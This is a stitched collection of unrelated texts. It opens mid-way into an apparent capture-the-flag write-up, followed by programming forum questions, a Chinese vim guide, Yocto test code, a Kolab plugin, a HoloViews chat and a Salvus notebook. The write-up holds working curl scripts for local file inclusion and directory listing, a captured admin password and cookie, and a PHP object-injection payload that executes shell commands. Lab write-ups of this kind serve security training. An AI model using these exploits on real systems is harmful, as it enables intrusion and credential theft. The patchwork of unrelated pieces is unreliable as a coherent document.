curl --silent --http3 'https://elf-invaders.elfu.org/api.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw "conf=${1}" | sed -n 's/.*"data":"//p' | sed -n 's/"}//p'
echo ''
We can then use the script to grab stuff
../config/config.json returns a file
../../www/config/config.json
./lfi.sh "../../../var/www/config/config.json" works but /var/www/config/config.json doesn't work
../lfi.sh ../html/api.php
in api.php
<?php
// Made By Alabaster Snowball on 5/1/2019
function get_db() {
$dbname = '/var/www/db/elfinvaders.sqlite';
if (file_exists($dbname) && filesize($dbname) > 500000) {
unlink($dbname);
}
Find the name of the debug PCAP on the web server.
Looking in api.php, we can do directory listings too with list= as the payload. Create dir.sh:
#!/bin/sh
curl --silent --http3 'https://elf-invaders.elfu.org/api.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw "list=${1}"
echo ''
We can use this to list files and find there’s a file adminlogin_debug.pcap.
Find Alabaster’s password. (e.g. DirectReindeerFlatteryStable)
Grabbing the adminlogin_debug.client_random and using it in wireshark to decrypt the QUIC in the pcap we find some payloads:
@Ç(ÍðôÒ¹~îåÚ6¡GREASE is the word,ÔQ`rRj®zÿ×P¢\.®Ã_P%¶Pë¸úàZþ?ÝTqÿï@Eusername=alabaster_snowball&password=4084072e86e12aabef9ace3e39145ba3
Entering 4084072e86e12aabef9ace3e39145ba3 as the flag works.
Update the cabinet’s firmware and retrieve the new version number.
People left files sitting around so I found this without doing what’s intended, just the LFI and directory listing, but I did most of the object injection anyways.
2.11516925085506347
get_auth_cookie.sh
#!/bin/sh
curl -v --http3 'https://elf-invaders.elfu.org/admin.php' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw "username=alabaster_snowball&password=4084072e86e12aabef9ace3e39145ba3" 2>&1 | grep "set-cookie" | sed -E "s/.*elfinv=([a-zA-Z0-9._-]+);.*/\1/"
php for generating the object injection
<?php
class OldAdminMethod
{
// Will remove this later after testing more secure new admin class
public $command;
public $logname;
function __construct($cmd="", $log='/var/www/db/cmdhist.log')
{
$this->command = $cmd;
$this->logname = $log;
}
public function readlog() {
if (file_exists($this->logname) && is_readable($this->logname)) {
return preg_replace( '/[^[:print:]\r\n\t]/', '', file_get_contents($this->logname));
}
}
function __destruct()
{
$stdout = shell_exec($this->command);
if (strlen($stdout)) {
if (is_writable(dirname($this->logname))) {
file_put_contents($this->logname, "{$this->command}\n$stdout");
}
}
}
}
$file = '/var/www/db/cmdhist.log';
$oldAdminMethod = new OldAdminMethod('/usr/bin/firmwareupdate', $file);
echo "'" . serialize($oldAdminMethod) . "'";
echo "\n";
generates
'O:14:"OldAdminMethod":2:{s:7:"command";s:2:"ls";s:7:"logname";s:23:"/var/www/db/cmdhist.log";}'
Then we can use the cookie and the above to generate a request to admin.php to do command injection via the object injection. When instantiating the class
the constructor and then the destructor will be called.
curl -v --http3 'https://elf-invaders.elfu.org/admin.php' -H "Cookie:
elfinv=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWxhYmFzdGVyX3Nub3diYWxsIiwiZXhwaXJlcyI6MTU4OTY3Mjc3NiwiZXhwIjozMTc5MjU5MTUyfQ.fwQJ4c-jpMHxG7_H_4uT82368Xb9DnE1LhhE0HcX03k" -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw 'method=read_file&arguments=O:14:"OldAdminMethod":2:{s:7:"command";s:23:"/usr/bin/firmwareupdate";s:7:"logname";s:23:"/var/www/db/cmdhist.log";}'
Then we should be able to use LFI to get the log.
elfuser@bdd5e02ba86f:~\$ ./lfi.sh ../db/cmdhist.log | xxd -r -p
/usr/bin/firmwareupdate
Firmware Updated - Elf Invader Version 2.11516925085506347
|
I’ve run into an interesting issue. When setting up a table with data
from a file (I’m doing this in a block). I find that I can’t create
separate entries manually after the import. It complains about a
duplicate primary key. I’ve tried Schedule.id += 1 but id= either
isn’t defined or accessible in the class
Here is my code:
FasterCSV.foreach("schedule_store/#{@schedule_file.filename}",
“r”) do |row|
unless row[3] == “CRN”
# This would be faster as straight SQL if the current method
# slows down too much.
#
# Would probably be cleaner with straight SQL too.
self.associate(row[0], row[1])
self.first_name = row[0]
self.last_name = row[1]
self.place = row[2]
self.crn = row[3]
self.course = row[4]
self.title = row[5]
self.mx = row[6]
self.enr = row[7]
self.avl = row[8]
self.days = row[9]
self.start_time = row[10]
self.end_time = row[11]
self.start_date = row[12]
self.end_date = row[13]
self.create
self.id += 1
# Schedule.id += 1
end
end
Anyone know how I can get Rails to realize what the current id is
after the automated import?
Thanks,
Glen
|
From the example here, I could split bytes32 to bytes16. But I am unable to use a similar approach to split bytes9 into three parts. Can someone help me understand what am I doing wrong?
//working
function split2(bytes32 source) constant returns (bytes16, bytes16){
bytes16[2] memory y = [bytes16(0), 0];
assembly {
mstore(y, source)
mstore(add(y, 16), source)
}
return (y[0], y[1]);
}
//not working
function split3(bytes9 source) constant returns (bytes3, bytes3, bytes3){
bytes3[3] memory y = [bytes3(0), 0, 0];
assembly {
mstore(y, source)
mstore(add(y, 3), source)
mstore(add(y, 6), source)
}
return (y[0], y[1], y[2]);
}
|
一、编辑保存
1.命令模式(command mode)
打开文件:vim + 文件名称
例如:vim /etc/profile
注意:如果文件不存在,则为新建文件。
2.插入模式(Insert mode)
w:write q:quit i:insert d:delete
使用vim打开/新建文件后,输入【i】即可输入内容。
3.底行模式(last line mode)
进入方式:
1.插入模式中:按【Esc】键 --> 输入【:】即可进入底行模式
2.命令模式直接: 输入【:】即可进入底行模式
3.1.保存、退出
先进入底行模式:【Esc】+ 【:】1.保存退出: 输入【w】--> 输入【q】即可2.正常退出: 输入【q】即可3.不保存退出: 输入【q!】即可4.强制退出:输入【!】即可
3.2.操作行
先进入底行模式:【Esc】+ 【:】+【行号】1.复制当前行:yy2.粘贴由yy复制的行:p3.删除当前行:dd4.恢复误删除的行:u
二、常用属性
贴几个常用的
1." 显示行号: set nu(number)
2." 显示标尺: set ruler
3." 语法高亮: syntax on
4." 突出显示当前行: set cursorline
5." 输入命令高亮显示: set showcmd
6." 设置背景色:set background=dark
7." 用浅色高亮当前行 autocmd InsertEnter * se cul
8." 关闭7: autocmd InsertLeave * se nocul
三、Vim的配置文档
$ vim .vimrc
下面贴下我的配置文档
""""""""""""""""""""""""""""""""""""""""""
"""""""""""""""""显示相关"""""""""""""""""
""""""""""""""""""""""""""""""""""""""""""
set shortmess=atI " 启动的时候不显示那个援助乌干达儿童的提示
set nu " 显示行号
syntax on " 语法高亮
autocmd InsertEnter * se cul " 用浅色高亮当前行
set cursorline " 突出显示当前行
set ruler " 显示标尺
set showcmd " 输入的命令显示出来,看的清楚些
""""""""""""""""""""""""""""""""""""""""""
""""""""""""""""属性设置"""""""""""""""""
""""""""""""""""""""""""""""""""""""""""""
set clipboard+=unnamed "共享剪贴板
set autowrite "自动保存
set autoindent " 自动缩进
set foldenable " 允许折叠
set foldmethod=manual " 手动折叠
set foldcolumn=0
set foldmethod=indent
set foldlevel=3
set foldenable " 开始折叠
set nocompatible " 不要使用vi的键盘模式,而是vim自己的
set noeb " 去掉输入错误的提示声音
set confirm " 在处理未保存或只读文件的时候,弹出确认
set tabstop=4 " Tab键的宽度
set softtabstop=4 " 统一缩进为4
set shiftwidth=4
"禁止生成临时文件
set nobackup
set noswapfile
set ignorecase "搜索忽略大小写
set hlsearch "搜索逐字符高亮
set incsearch
""""""""""""""""""""""""""""""""""""""""""
""""""""""""显示中文帮助 """""""""""""""""
""""""""""""""""""""""""""""""""""""""""""
"语言设置
set langmenu=zh_CN.UTF-8
set helplang=cn
if version >= 603
set helplang=cn
set encoding=utf-8
endif
""""""""""""""""""""""""""""""""""""""""""
""""""""""""编码-语言 """""""""""""""""
""""""""""""""""""""""""""""""""""""""""""
set fencs=utf-8,ucs-bom,shift-jis,gb18030,gbk,gb2312,cp936
set termencoding=utf-8
set encoding=utf-8
set fileencoding=utf-8
set fileencodings=utf-8,gb2312,gbk,gb18030
set fileformats=unix
""""""""""""""""""""""""""""""""""""""""""
""""""""""""设置配色方案 """""""""""""""""
""""""""""""""""""""""""""""""""""""""""""
"colorscheme murphy
"字体
"if (has("gui_running"))
" set guifont=Bitstream\ Vera\ Sans\ Mono\ 10
"endif
|
blob: d817b755fed3bb9165aa720aaa0800f160daae55 (
plain
)
#
# SPDX-License-Identifier: MIT
#
from oeqa.selftest.case import OESelftestTestCase
from oeqa.utils.commands import runCmd, bitbake, get_bb_var, get_bb_vars, runqemu
from oeqa.utils.sshcontrol import SSHControl
import os
import re
import tempfile
import shutil
import oe.lsb
class TestExport(OESelftestTestCase):
@classmethod
def tearDownClass(cls):
runCmd("rm -rf /tmp/sdk")
super(TestExport, cls).tearDownClass()
def test_testexport_basic(self):
"""
Summary: Check basic testexport functionality with only ping test enabled.
Expected: 1. testexport directory must be created.
2. runexported.py must run without any error/exception.
3. ping test must succeed.
Product: oe-core
Author: Mariano Lopez <[email protected]>
"""
features = 'INHERIT += "testexport"\n'
# These aren't the actual IP addresses but testexport class needs something defined
features += 'TEST_SERVER_IP = "192.168.7.1"\n'
features += 'TEST_TARGET_IP = "192.168.7.1"\n'
features += 'TEST_SUITES = "ping"\n'
self.write_config(features)
# Build tesexport for core-image-minimal
bitbake('core-image-minimal')
bitbake('-c testexport core-image-minimal')
testexport_dir = get_bb_var('TEST_EXPORT_DIR', 'core-image-minimal')
# Verify if TEST_EXPORT_DIR was created
isdir = os.path.isdir(testexport_dir)
self.assertEqual(True, isdir, 'Failed to create testexport dir: %s' % testexport_dir)
with runqemu('core-image-minimal') as qemu:
# Attempt to run runexported.py to perform ping test
test_path = os.path.join(testexport_dir, "oe-test")
data_file = os.path.join(testexport_dir, 'data', 'testdata.json')
manifest = os.path.join(testexport_dir, 'data', 'manifest')
cmd = ("%s runtime --test-data-file %s --packages-manifest %s "
"--target-ip %s --server-ip %s --quiet"
% (test_path, data_file, manifest, qemu.ip, qemu.server_ip))
result = runCmd(cmd)
# Verify ping test was succesful
self.assertEqual(0, result.status, 'oe-test runtime returned a non 0 status')
def test_testexport_sdk(self):
"""
Summary: Check sdk functionality for testexport.
Expected: 1. testexport directory must be created.
2. SDK tarball must exists.
3. Uncompressing of tarball must succeed.
4. Check if the SDK directory is added to PATH.
5. Run tar from the SDK directory.
Product: oe-core
Author: Mariano Lopez <[email protected]>
"""
features = 'INHERIT += "testexport"\n'
# These aren't the actual IP addresses but testexport class needs something defined
features += 'TEST_SERVER_IP = "192.168.7.1"\n'
features += 'TEST_TARGET_IP = "192.168.7.1"\n'
features += 'TEST_SUITES = "ping"\n'
features += 'TEST_EXPORT_SDK_ENABLED = "1"\n'
features += 'TEST_EXPORT_SDK_PACKAGES = "nativesdk-tar"\n'
self.write_config(features)
# Build tesexport for core-image-minimal
bitbake('core-image-minimal')
bitbake('-c testexport core-image-minimal')
needed_vars = ['TEST_EXPORT_DIR', 'TEST_EXPORT_SDK_DIR', 'TEST_EXPORT_SDK_NAME']
bb_vars = get_bb_vars(needed_vars, 'core-image-minimal')
testexport_dir = bb_vars['TEST_EXPORT_DIR']
sdk_dir = bb_vars['TEST_EXPORT_SDK_DIR']
sdk_name = bb_vars['TEST_EXPORT_SDK_NAME']
# Check for SDK
tarball_name = "%s.sh" % sdk_name
tarball_path = os.path.join(testexport_dir, sdk_dir, tarball_name)
msg = "Couldn't find SDK tarball: %s" % tarball_path
self.assertEqual(os.path.isfile(tarball_path), True, msg)
# Extract SDK and run tar from SDK
result = runCmd("%s -y -d /tmp/sdk" % tarball_path)
self.assertEqual(0, result.status, "Couldn't extract SDK")
env_script = result.output.split()[-1]
result = runCmd(". %s; which tar" % env_script, shell=True)
self.assertEqual(0, result.status, "Couldn't setup SDK environment")
is_sdk_tar = True if "/tmp/sdk" in result.output else False
self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
tar_sdk = result.output
result = runCmd("%s --version" % tar_sdk)
self.assertEqual(0, result.status, "Couldn't run tar from SDK")
class TestImage(OESelftestTestCase):
def test_testimage_install(self):
"""
Summary: Check install packages functionality for testimage/testexport.
Expected: 1. Import tests from a directory other than meta.
2. Check install/uninstall of socat.
Product: oe-core
Author: Mariano Lopez <[email protected]>
"""
if get_bb_var('DISTRO') == 'poky-tiny':
self.skipTest('core-image-full-cmdline not buildable for poky-tiny')
features = 'INHERIT += "testimage"\n'
features += 'IMAGE_INSTALL_append = " libssl"\n'
features += 'TEST_SUITES = "ping ssh selftest"\n'
self.write_config(features)
# Build core-image-sato and testimage
bitbake('core-image-full-cmdline socat')
bitbake('-c testimage core-image-full-cmdline')
def test_testimage_dnf(self):
"""
Summary: Check package feeds functionality for dnf
Expected: 1. Check that remote package feeds can be accessed
Product: oe-core
Author: Alexander Kanavin <[email protected]>
"""
if get_bb_var('DISTRO') == 'poky-tiny':
self.skipTest('core-image-full-cmdline not buildable for poky-tiny')
features = 'INHERIT += "testimage"\n'
features += 'TEST_SUITES = "ping ssh dnf_runtime dnf.DnfBasicTest.test_dnf_help"\n'
# We don't yet know what the server ip and port will be - they will be patched
# in at the start of the on-image test
features += 'PACKAGE_FEED_URIS = "http://bogus_ip:bogus_port"\n'
features += 'EXTRA_IMAGE_FEATURES += "package-management"\n'
features += 'PACKAGE_CLASSES = "package_rpm"\n'
bitbake('gnupg-native -c addto_recipe_sysroot')
# Enable package feed signing
self.gpg_home = tempfile.mkdtemp(prefix="oeqa-feed-sign-")
signing_key_dir = os.path.join(self.testlayer_path, 'files', 'signing')
runCmd('gpg --batch --homedir %s --import %s' % (self.gpg_home, os.path.join(signing_key_dir, 'key.secret')), native_sysroot=get_bb_var("RECIPE_SYSROOT_NATIVE", "gnupg-native"))
features += 'INHERIT += "sign_package_feed"\n'
features += 'PACKAGE_FEED_GPG_NAME = "testuser"\n'
features += 'PACKAGE_FEED_GPG_PASSPHRASE_FILE = "%s"\n' % os.path.join(signing_key_dir, 'key.passphrase')
features += 'GPG_PATH = "%s"\n' % self.gpg_home
self.write_config(features)
# Build core-image-sato and testimage
bitbake('core-image-full-cmdline socat')
bitbake('-c testimage core-image-full-cmdline')
# remove the oeqa-feed-sign temporal directory
shutil.rmtree(self.gpg_home, ignore_errors=True)
def test_testimage_virgl_gtk(self):
"""
Summary: Check host-assisted accelerate OpenGL functionality in qemu with gtk frontend
Expected: 1. Check that virgl kernel driver is loaded and 3d acceleration is enabled
2. Check that kmscube demo runs without crashing.
Product: oe-core
Author: Alexander Kanavin <[email protected]>
"""
if "DISPLAY" not in os.environ:
self.skipTest("virgl gtk test must be run inside a X session")
distro = oe.lsb.distro_identifier()
if distro and distro == 'debian-8':
self.skipTest('virgl isn\'t working with Debian 8')
qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
features = 'INHERIT += "testimage"\n'
if 'gtk+' not in qemu_packageconfig:
features += 'PACKAGECONFIG_append_pn-qemu-system-native = " gtk+"\n'
if 'virglrenderer' not in qemu_packageconfig:
features += 'PACKAGECONFIG_append_pn-qemu-system-native = " virglrenderer"\n'
if 'glx' not in qemu_packageconfig:
features += 'PACKAGECONFIG_append_pn-qemu-system-native = " glx"\n'
features += 'TEST_SUITES = "ping ssh virgl"\n'
features += 'IMAGE_FEATURES_append = " ssh-server-dropbear"\n'
features += 'IMAGE_INSTALL_append = " kmscube"\n'
features += 'TEST_RUNQEMUPARAMS = "gtk-gl"\n'
self.write_config(features)
bitbake('core-image-minimal')
bitbake('-c testimage core-image-minimal')
def test_testimage_virgl_headless(self):
"""
Summary: Check host-assisted accelerate OpenGL functionality in qemu with egl-headless frontend
Expected: 1. Check that virgl kernel driver is loaded and 3d acceleration is enabled
2. Check that kmscube demo runs without crashing.
Product: oe-core
Author: Alexander Kanavin <[email protected]>
"""
import subprocess, os
try:
content = os.listdir("/dev/dri")
if len([i for i in content if i.startswith('render')]) == 0:
self.skipTest("No render nodes found in /dev/dri: %s" %(content))
except FileNotFoundError:
self.skipTest("/dev/dri directory does not exist; no render nodes available on this machine.")
try:
dripath = subprocess.check_output("pkg-config --variable=dridriverdir dri", shell=True)
except subprocess.CalledProcessError as e:
self.skipTest("Could not determine the path to dri drivers on the host via pkg-config.\nPlease install Mesa development files (particularly, dri.pc) on the host machine.")
qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
features = 'INHERIT += "testimage"\n'
if 'virglrenderer' not in qemu_packageconfig:
features += 'PACKAGECONFIG_append_pn-qemu-system-native = " virglrenderer"\n'
if 'glx' not in qemu_packageconfig:
features += 'PACKAGECONFIG_append_pn-qemu-system-native = " glx"\n'
features += 'TEST_SUITES = "ping ssh virgl"\n'
features += 'IMAGE_FEATURES_append = " ssh-server-dropbear"\n'
features += 'IMAGE_INSTALL_append = " kmscube"\n'
features += 'TEST_RUNQEMUPARAMS = "egl-headless"\n'
self.write_config(features)
bitbake('core-image-minimal')
bitbake('-c testimage core-image-minimal')
class Postinst(OESelftestTestCase):
def test_postinst_rootfs_and_boot(self):
"""
Summary: The purpose of this test case is to verify Post-installation
scripts are called when rootfs is created and also test
that script can be delayed to run at first boot.
Dependencies: NA
Steps: 1. Add proper configuration to local.conf file
2. Build a "core-image-minimal" image
3. Verify that file created by postinst_rootfs recipe is
present on rootfs dir.
4. Boot the image created on qemu and verify that the file
created by postinst_boot recipe is present on image.
Expected: The files are successfully created during rootfs and boot
time for 3 different package managers: rpm,ipk,deb and
for initialization managers: sysvinit and systemd.
"""
import oe.path
vars = get_bb_vars(("IMAGE_ROOTFS", "sysconfdir"), "core-image-minimal")
rootfs = vars["IMAGE_ROOTFS"]
self.assertIsNotNone(rootfs)
sysconfdir = vars["sysconfdir"]
self.assertIsNotNone(sysconfdir)
# Need to use oe.path here as sysconfdir starts with /
hosttestdir = oe.path.join(rootfs, sysconfdir, "postinst-test")
targettestdir = os.path.join(sysconfdir, "postinst-test")
for init_manager in ("sysvinit", "systemd"):
for classes in ("package_rpm", "package_deb", "package_ipk"):
with self.subTest(init_manager=init_manager, package_class=classes):
features = 'CORE_IMAGE_EXTRA_INSTALL = "postinst-delayed-b"\n'
features += 'IMAGE_FEATURES += "package-management empty-root-password"\n'
features += 'PACKAGE_CLASSES = "%s"\n' % classes
if init_manager == "systemd":
features += 'DISTRO_FEATURES_append = " systemd"\n'
features += 'VIRTUAL-RUNTIME_init_manager = "systemd"\n'
features += 'DISTRO_FEATURES_BACKFILL_CONSIDERED = "sysvinit"\n'
features += 'VIRTUAL-RUNTIME_initscripts = ""\n'
self.write_config(features)
bitbake('core-image-minimal')
self.assertTrue(os.path.isfile(os.path.join(hosttestdir, "rootfs")),
"rootfs state file was not created")
with runqemu('core-image-minimal') as qemu:
# Make the test echo a string and search for that as
# run_serial()'s status code is useless.'
for filename in ("rootfs", "delayed-a", "delayed-b"):
status, output = qemu.run_serial("test -f %s && echo found" % os.path.join(targettestdir, filename))
self.assertEqual(output, "found", "%s was not present on boot" % filename)
def test_failing_postinst(self):
"""
Summary: The purpose of this test case is to verify that post-installation
scripts that contain errors are properly reported.
Expected: The scriptlet failure is properly reported.
The file that is created after the error in the scriptlet is not present.
Product: oe-core
Author: Alexander Kanavin <[email protected]>
"""
import oe.path
vars = get_bb_vars(("IMAGE_ROOTFS", "sysconfdir"), "core-image-minimal")
rootfs = vars["IMAGE_ROOTFS"]
self.assertIsNotNone(rootfs)
sysconfdir = vars["sysconfdir"]
self.assertIsNotNone(sysconfdir)
# Need to use oe.path here as sysconfdir starts with /
hosttestdir = oe.path.join(rootfs, sysconfdir, "postinst-test")
for classes in ("package_rpm", "package_deb", "package_ipk"):
with self.subTest(package_class=classes):
features = 'CORE_IMAGE_EXTRA_INSTALL = "postinst-rootfs-failing"\n'
features += 'PACKAGE_CLASSES = "%s"\n' % classes
self.write_config(features)
bb_result = bitbake('core-image-minimal', ignore_status=True)
self.assertGreaterEqual(bb_result.output.find("Postinstall scriptlets of ['postinst-rootfs-failing'] have failed."), 0,
"Warning about a failed scriptlet not found in bitbake output: %s" %(bb_result.output))
self.assertTrue(os.path.isfile(os.path.join(hosttestdir, "rootfs-before-failure")),
"rootfs-before-failure file was not created")
self.assertFalse(os.path.isfile(os.path.join(hosttestdir, "rootfs-after-failure")),
"rootfs-after-failure file was created")
|
Gostaria de saber como criar os botões maximizar, minimizar e fechar no tkinter (Python). Apos ser retirado a barra de tÃtulo, devem ser criados novos botões para personalizar a janela e deixar de forma diferente do padrão. Abaixo temos o código incompleto que estou criando no windows 7: (tudo que estiver dentro da função def tem que ter identação) obs: o programa começa no from tkinter import * e termina no janela.mainloop().
from tkinter import *
janela = Tk()
janela.title(" >>> Como criar os botão Maximizar? <<< ")
janela['bg'] = 'gray'
janela.wm_attributes('-fullscreen','true')
janela.geometry('340x400+500+200')
m = 0
def minimizar():
janela.overrideredirect(False)
janela.iconify()
janela.wm_attributes('-fullscreen', 'True')
def fechar():
janela.destroy()
def maximizar1():
global m
m = 0
janela.overrideredirect(True)
janela.geometry('1360x800+0+0')
def maximizar():
global m
m = 1
janela.wm_attributes('-fullscreen', 'False')
janela.overrideredirect(True)
janela.geometry('340x300+500+200')
def maxi():
print('1m=> ', m)
if m == 0:
maximizar()
elif m == 1:
maximizar1()
def move():
pass
bt1 = Button(janela, text='Minimizar', font=("Helvetica", 14), bg='grey', command=minimizar)
bt1.grid(row=0, column=1)
bt2 = Button(janela, text='Maximizar', font=("Helvetica", 14), bg='grey', command=maxi)
bt2.grid(row=0, column=2)
bt3 = Button(janela, text='Sair', font=("Helvetica", 14), bg='grey', command=fechar)
bt3.grid(row=0, column=3)
janela.mainloop()
|
blob: c55b89923fe9752a95fdb1b2779b9620d6a05838 (
plain
)
# -*- coding: utf-8 -*-
# Copyright 2010-2011 Kolab Systems AG (http://www.kolabsys.com)
#
# Jeroen van Meeuwen (Kolab Systems) <vanmeeuwen a kolabsys.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 3 or, at your option, any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import pykolab
from pykolab.translate import _
conf = pykolab.getConf()
log = pykolab.getLogger('pykolab.plugins.dynamicquota')
class KolabDynamicquota(object):
"""
Example plugin making quota adjustments given arbitrary conditions.
"""
def __init__(self):
pass
def add_options(self, *args, **kw):
pass
def set_user_folder_quota(self, *args, **kw):
"""
The arguments passed to the 'set_user_folder_quota' hook:
- used (integer, in KB)
- current quota (integer, in KB)
- quota (integer, in KB)
"""
for keyword in [ 'used', 'current_quota', 'new_quota', 'default_quota' ]:
if not kw.has_key(keyword):
log.warning(_("No keyword %s passed to set_user_folder_quota") %(keyword))
return 0
# Escape the user without quota
if kw['new_quota'] == 0:
# Unless default quota is set
if kw['default_quota'] > 0:
log.info(_("The new quota was set to 0, but default quota > 0, returning default quota"))
return kw['default_quota']
#print "new quota is 0, and default quota is no larger then 0, returning 0"
return 0
# Make your adjustments here, for example:
#
# - increase the quota by 10% if the currently used storage size
# is over 90%
if kw['new_quota'] < int(float(kw['used']) * 1.1):
#print "new quota is smaller then 110%% of what is currently used, returning 110%% of used"
new_quota = int(float(kw['used']) * 1.1)
elif kw['new_quota'] > int(float(kw['used']) * 1.1):
# TODO: If the current quota in IMAP had been set to 0, but we want to apply quota, and
# 0 is current_quota, 90% of that is still 0...
#print "new quota is larger then 110%% of what is currently used, returning 90%% of current quota"
new_quota = int(float(kw['current_quota']) * 0.9)
if kw['default_quota'] > new_quota:
log.info(_("The default quota is larger then the calculated new quota, using the default quota"))
return kw['default_quota']
return new_quota
|
philippjfr on highlight_operation
Use df._meta for empty df (compare)
philippjfr on highlight_operation
Fix reduce on empty element Null test over mask area (compare)
jlstevens on highlight_operation
Unchained transformers (compare)
philippjfr on highlight_operation
Correctly look up vdims (compare)
philippjfr on highlight_operation
Fix flake (compare)
philippjfr on highlight_operation
Remove vdims reference (compare)
master into release candidate shape in ~2 weeks and then to get a release out early in the week of the 23rd (before the U.S. Thanksgiving holiday). Let me know how I can help out with review / testing of other PRs. hv.Tiles element, and one thing I'm running into is that the mapbox library that plotly uses expects coordinates in lat/lon (even though they are displayed in Web Mercator). In the past I've done this with pyproj. How would you all feel about the Plotly backend using pyproj as an optional dependency for the Tiles element? @philippjfr scattermapbox trace (for geo scatter plots) that's separate from the scatter trace. Are these the same thing for Bokeh? I'm wondering if I'll need to do something special in the overlay plot logic to check whether to convert the Scatter element into a plotly scatter or scattermapbox trace. hv.Scatter dimension values as web-mercator and would perform the conversion to lat/lon internall during display. hv.Scatter will be of a different type when the hv.Scatter is overlayed with an hv.Tiles element.
import numpy as np
import holoviews as hv
from holoviews import opts
hv.extension('bokeh')
from bokeh.models import HoverTool
from bokeh.models import CustomJSHover
ls = np.linspace(0, 10, 200)
xx, yy = np.meshgrid(ls, ls)
MyCustomZ = CustomJSHover(code='''return "test";''')
MyHover1 = HoverTool(
tooltips=[
( 'newx', '@x'),
( 'newy', '@y'),
( 'newz', '@z{custom}'),
],
formatters={
'x' : 'numeral',
'y' : 'numeral',
'@z' : MyCustomZ,
},
point_policy="follow_mouse"
)
img = hv.Image(np.sin(xx)*np.cos(yy)).opts(tools=[MyHover1])
img
|
This documentation is not for the latest stable Salvus version.
In this notebook, you build a piecewise structured mesh using a 1D model read from a file and automatic placement of refinements. Play with the input parameters to find out:
The automatic placement considers a number of criteria. If any of them is not met, the refinement is pushed further downwards. This is based on the assumption, that velocities increase with depth in most models (which we enforce by making the size function monotonous before calculating element sizes). The criteria are:
# set up the notebook
%matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
plt.rcParams["figure.figsize"] = (10, 8)
The model file, edit as you like with colums in units of km, km/s and kg/m^3.
%%writefile three_layer.bmNAME three_layerUNITS kmCOLUMNS depth rho vp vs 0.0 2.6 1.7 1.0 10.0 2.6 1.7 1.0 10.0 3.0 3.5 2.2 15.0 3.0 3.5 2.2 15.0 3.5 3.8 2.6 100.0 3.5 3.8 2.6
Writing three_layer.bm
Read the model file and plot the seismic velocities.
from salvus.mesh.models_1D import model
model = model.read("three_layer.bm")
model.plot_vp_vs_profile(depth=True)
The model provides the discontinuities and functionality to compute element sizes according to the resolution criterion. Internally, we work with normalized coordinates, hence the need to scale.
print(
"discontinuities:",
["{:.1f}".format(i) for i in model.discontinuities * model.scale],
)
print(
"element size: ",
[
"{:.1f}".format(i)
for i in model.get_edgelengths(
dominant_period=1.0, elements_per_wavelength=2
)
* model.scale
],
)
discontinuities: ['0.0', '85000.0', '90000.0', '100000.0'] element size: ['1300.0', '1100.0', '500.0']
Note: Top down approach means minimizing number of elements at the surface at the cost of more elements at the bottom (default). If False, bottom up approach is used, that is minimizing number of elements at the bottom at the cost of more elements at the surface. Top down leads to fewer refinement. Which one is more efficient depends on the velocity model and refinement style.
frequency = 0.1 # maximum frequency in Hz
max_x = 200000.0 # Domain size in horizontal direction in m
hmax_refinement = (
1.5 # critertion to avoid refinements in thin layers, need to be > 1.0,
)
# default is 1.5, smaller value = more aggressive
refinement_style = "doubling" # 'doubling' or 'tripling'
refinement_top_down = True # True or False
ndim = 2 # 2 or 3
from salvus.mesh.skeleton import Skeleton
if ndim == 2:
horizontal_boundaries = (np.array([0]), np.array([max_x / model.scale]))
elif ndim == 3:
horizontal_boundaries = (
np.array([0, 0]),
np.array([max_x / model.scale, max_x / model.scale]),
)
sk = Skeleton.create_cartesian_mesh(
model.discontinuities,
model.get_edgelengths(1.0 / frequency),
hmax_refinement=hmax_refinement,
horizontal_boundaries=horizontal_boundaries,
refinement_top_down=refinement_top_down,
refinement_style=refinement_style,
ndim=ndim,
